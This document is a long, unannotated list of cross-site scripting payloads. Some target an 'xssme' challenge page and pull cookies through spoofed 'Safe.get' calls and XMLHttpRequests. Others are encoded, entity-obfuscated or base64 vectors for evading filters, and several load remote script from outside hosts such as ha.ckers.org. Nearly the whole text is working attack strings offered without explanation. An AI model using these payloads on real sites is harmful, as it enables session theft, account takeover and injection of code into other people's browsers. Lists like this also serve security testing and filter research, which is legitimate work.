 <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> 
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> 
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> 
<script>alert(document.head.innerHTML.substr(146,20));</script>
 <script>alert(document.head.childNodes[3].text)</script>
 <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> 
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> 
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> 
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> 
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> 
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> 
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> 
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> 
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> 
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> 
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # 
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #  
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># 
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># 
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 
<script for=document event=onreadystatechange>getElementById('safe123').click()</script> 
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> 
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> 
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> 
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> 
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> 
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> 
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># 
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); 
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> 
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> 
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); 
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> 
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); 
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> 
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> 
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); 
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E 
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> 
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E 
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> 
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> 
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> 
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> 
<div onmouseover='alert&lpar;1&rpar;'>DIV</div> 
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> 
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> 
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? 
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? 
<var onmouseover="prompt(1)">On Mouse Over</var>? 
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> 
<img src="/" =_=" title="onerror='prompt(1)'"> 
<%<!--'%><script>alert(1);</script --> 
<script src="data:text/javascript,alert(1)"></script> 
<iframe/src \/\/onload = prompt(1) 
<iframe/onreadystatechange=alert(1) 
<svg/onload=alert(1) 
<input value=<><iframe/src=javascript:confirm(1) 
<input type="text" value=``<div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com 
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? 
<svg><script ?>alert(1) 
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> 
<img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script ? <img src ?itworksonchrome?\/onerror = alert(1)??? <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> "><img src=x onerror=prompt(1);> <SCRIPT>alert('XSS');</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <IMG SRC="javascript:alert('XSS')" <SCRIPT>a=/XSS/ \";alert('XSS');// <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> getURL("javascript:alert('XSS')") a="get"; <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <svg%0Aonload=%09((pro\u006dpt))()// <sCriPt x>(((confirm)))``</scRipt x> <w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z <deTAiLs/open/oNtoGGle=confirm()> <scRiPt y="><">/*<sCRipt* */prompt()</script <A href="javascript%26colon;confirm()">click <sVg oNloaD=write()> <A href=javas%26#99;ript:alert(1)>click <sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)> <svG/x=">"/oNloaD=confirm()// <--`<iMG/srC=` onerror=confirm``> --!> <SVg </onlOad ="1> (_=prompt,_(1)) ""> <!--><scRipT src=//14.rs> <sCriPt/src=//14.rs? <sCRIpt x=">" src=//15.rs></script> <D3/OnMouSEenTer=[2].find(confirm)>z <D3"<"/OncLick="1>[confirm``]"<">z <D3/OnpOinTeReENter=confirm``>click here <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> <Z oncut=alert()>x <iFrAMe/src \/\/onload = prompt(1) <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div> <div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div> <div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% 